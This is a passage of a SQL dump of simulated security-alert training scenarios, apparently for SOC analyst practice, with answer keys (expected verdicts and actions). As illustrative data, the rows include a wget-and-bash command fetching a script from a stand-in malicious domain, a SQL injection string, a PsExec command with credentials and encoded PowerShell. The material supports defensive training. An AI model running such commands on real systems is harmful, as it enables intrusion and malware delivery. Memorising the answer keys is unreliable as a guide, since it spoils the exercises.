detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T05:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.12\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand 
JABhAGwAdABlAHIAdAAgACgAJwBzAG8AbQBlAC4AcwB1AHMAcABlAGMAdABlAHQAcgBlAGcAHwAnACkA\\\"}\"},{\"timestamp\":\"2026-02-15T12:46:56.739Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T05:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.12\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand JABhAGwAdABlAHIAdAAgACgAJwBzAG8AbQBlAC4AcwB1AHMAcABlAGMAdABlAHQAcgBlAGcAHwAnACkA\\\"}\"},{\"timestamp\":\"2026-02-15T12:45:56.739Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T05:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.12\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand JABhAGwAdABlAHIAdAAgACgAJwBzAG8AbQBlAC4AcwB1AHMAcABlAGMAdABlAHQAcgBlAGcAHwAnACkA\\\"}\"},{\"timestamp\":\"2026-02-15T12:44:56.739Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T05:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.12\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand JABhAGwAdABlAHIAdAAgACgAJwBzAG8AbQBlAC4AcwB1AHMAcABlAGMAdABlAHQAcgBlAGcAHwAnACkA\\\"}\"},{\"timestamp\":\"2026-02-15T12:43:56.739Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T05:22:10Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.12\\\",\\\"hostname\\\":\\\"workstation01\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand JABhAGwAdABlAHIAdAAgACgAJwBzAG8AbQBlAC4AcwB1AHMAcABlAGMAdABlAHQAcgBlAGcAHwAnACkA\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1254, 'Email Phishing Attempt with Malicious URL', 'critical', 'Proofpoint', 'Phishing email detected with a link pointing to a known malicious domain.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-02-14T06:45:30Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"src_email\":\"phisher@malicious.com\",\"dst_ip\":\"192.168.1.25\",\"username\":\"jdoe\",\"hostname\":\"email-server\",\"url\":\"http://malicious-domain.com/login\"}', '2026-02-12 22:48:13', '2026-02-16 17:44:40', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"phisher@malicious.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Email address associated with multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-domain.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malicious domain used for phishing\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The detected email contains a link to a malicious domain, indicating a phishing attempt.\"}', 'Intermediate', 'IR', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Email Phishing Attempt with Malicious URL\",\"date\":\"2026-02-15T12:47:56.741Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, 
please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1255, 'False Positive: Legitimate Admin Login from Known IP', 'low', 'Firewall', 'An admin login was flagged as suspicious but originated from a known and trusted IP address.', 'Access', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-02-14T07:00:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"203.0.113.200\",\"dst_ip\":\"10.0.0.5\",\"username\":\"admin\",\"hostname\":\"corp-firewall\"}', '2026-02-13 12:35:28', '2026-02-15 12:47:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Trusted IP address belonging to corporate office\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network IP address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"access\",\"analysis_notes\":\"The login was legitimate and originated from a known corporate IP address.\"}', 'Intermediate', 'IR', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1256, 'Potential Data Exfiltration via Suspicious DNS Queries', 'high', 'CrowdStrike', 'Unusual DNS queries detected from an internal host to an unrecognized external domain.', 'Data Exfil', 'T1048', 0, 'resolved', NULL, '{\"timestamp\":\"2026-02-14T09:12:45Z\",\"event_type\":\"dns_query\",\"src_ip\":\"192.168.1.15\",\"hostname\":\"workstation02\",\"domain\":\"suspicious-exfil.com\"}', '2026-02-12 21:49:20', '2026-02-19 15:52:50', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"suspicious-exfil.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain associated with data exfiltration activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"block_domain\",\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The DNS queries to a known malicious domain indicate potential data exfiltration.\"}', 'Intermediate', 'IR', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1257, 'False Positive: Normal Network Traffic Misidentified as Anomaly', 'low', 'FTK', 'Routine network traffic flagged as suspicious due to a temporary network issue.', 'Network Anomaly', 'T1071', 0, 'Closed', 229, '{\"timestamp\":\"2026-02-14T10:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.101\",\"dst_ip\":\"192.168.1.102\",\"hostname\":\"server01\"}', '2026-02-14 10:21:27', '2026-03-10 23:21:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network\",\"analysis_notes\":\"The alert was triggered due to a temporary issue that misidentified routine traffic as anomalous.\"}', 'Intermediate', 'IR', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-15T12:47:56.745Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.101\\\",\\\"dst_ip\\\":\\\"192.168.1.102\\\",\\\"hostname\\\":\\\"server01\\\"}\"},{\"timestamp\":\"2026-02-15T12:46:56.745Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.101\\\",\\\"dst_ip\\\":\\\"192.168.1.102\\\",\\\"hostname\\\":\\\"server01\\\"}\"},{\"timestamp\":\"2026-02-15T12:45:56.745Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.101\\\",\\\"dst_ip\\\":\\\"192.168.1.102\\\",\\\"hostname\\\":\\\"server01\\\"}\"},{\"timestamp\":\"2026-02-15T12:44:56.745Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.101\\\",\\\"dst_ip\\\":\\\"192.168.1.102\\\",\\\"hostname\\\":\\\"server01\\\"}\"},{\"timestamp\":\"2026-02-15T12:43:56.745Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:30:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.101\\\",\\\"dst_ip\\\":\\\"192.168.1.102\\\",\\\"hostname\\\":\\\"server01\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1258, 'SQL Injection Attempt Detected on Public Web Server', 'critical', 'Wazuh', 'A potential SQL injection attempt identified in the request body of an incoming web request.', 'Web Attack', 'T1190', 1, 'resolved', NULL, '{\"timestamp\":\"2026-02-14T11:15:30Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.55\",\"dst_ip\":\"203.0.113.10\",\"hostname\":\"public-web-server\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-02-12 23:40:47', '2026-02-16 17:43:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for SQL injection attempts\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The request body contains a classic SQL injection payload, indicating an attack attempt.\"}', 'Intermediate', 'IR', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-15T12:47:56.746Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T11:15:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.55\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"hostname\\\":\\\"public-web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-15T12:46:56.746Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR 
\'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T11:15:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.55\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"hostname\\\":\\\"public-web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-15T12:45:56.746Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T11:15:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.55\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"hostname\\\":\\\"public-web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-15T12:44:56.746Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T11:15:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.55\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"hostname\\\":\\\"public-web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-15T12:43:56.746Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T11:15:30Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.55\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"hostname\\\":\\\"public-web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' 
--\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1259, 'Lateral Movement Detected via PsExec Tool', 'high', 'Velociraptor', 'PsExec tool execution detected indicating potential lateral movement between internal hosts.', 'Lateral Movement', 'T1077', 1, 'resolved', NULL, '{\"timestamp\":\"2026-02-14T13:25:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"192.168.1.30\",\"hostname\":\"workstation03\",\"command_line\":\"PsExec.exe \\\\\\\\192.168.1.30 -u admin -p password cmd\"}', '2026-02-14 17:16:06', '2026-02-19 15:18:37', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"PsExec.exe \\\\\\\\192.168.1.30 -u admin -p password cmd\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"PsExec usage detected\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PsExec for remote execution indicates possible lateral movement within the network.\"}', 'Intermediate', 'IR', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-15T12:47:56.747Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T13:25:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"hostname\\\":\\\"workstation03\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.1.30 -u admin -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-15T12:46:56.747Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T13:25:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"hostname\\\":\\\"workstation03\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.1.30 -u admin -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-15T12:45:56.747Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T13:25:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"hostname\\\":\\\"workstation03\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.1.30 -u admin -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-15T12:44:56.747Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T13:25:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"hostname\\\":\\\"workstation03\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.1.30 -u admin -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-15T12:43:56.747Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T13:25:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"hostname\\\":\\\"workstation03\\\",\\\"command_line\\\":\\\"PsExec.exe \\\\\\\\\\\\\\\\192.168.1.30 -u admin -p password cmd\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1260, 'Malware Detected in Executable File via Volatility', 'critical', 'Volatility', 'A malware executable file was detected based on its hash during memory analysis.', 'Malware', 'T1105', 1, 'resolved', NULL, '{\"timestamp\":\"2026-02-14T14:45:50Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.40\",\"hostname\":\"infected-host\",\"command_line\":\"malware.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-02-13 18:11:42', '2026-02-16 17:42:59', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.40\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash matches a known malware signature, confirming the presence of malware.\"}', 'Intermediate', 'IR', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-15T12:47:56.748Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T14:45:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.40\\\",\\\"hostname\\\":\\\"infected-host\\\",\\\"command_line\\\":\\\"malware.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-15T12:46:56.748Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T14:45:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.40\\\",\\\"hostname\\\":\\\"infected-host\\\",\\\"command_line\\\":\\\"malware.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-15T12:45:56.748Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T14:45:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.40\\\",\\\"hostname\\\":\\\"infected-host\\\",\\\"command_line\\\":\\\"malware.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-15T12:44:56.748Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T14:45:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.40\\\",\\\"hostname\\\":\\\"infected-host\\\",\\\"command_line\\\":\\\"malware.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-15T12:43:56.748Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T14:45:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.40\\\",\\\"hostname\\\":\\\"infected-host\\\",\\\"command_line\\\":\\\"malware.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1261, 'Suspicious Command Execution Detected on Internal Host', 'high', 'Velociraptor', 'A potentially malicious command execution was detected on an internal host, indicating possible command injection. The command line used is commonly associated with unauthorized system access attempts.', 'Malware', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-02-14T03:45:12Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"internal-host-01\",\"command_line\":\"wget http://malicious-domain.com/malware.sh -O /tmp/malware.sh && bash /tmp/malware.sh\"}', '2026-02-14 17:39:26', '2026-02-16 05:11:38', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"wget http://malicious-domain.com/malware.sh -O /tmp/malware.sh && bash /tmp/malware.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command recognized as malware delivery and execution attempt\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The command execution is a clear indicator of a malware attempt, requiring immediate containment and analysis.\"}', 'Beginner', 'IR', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-15T12:47:56.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
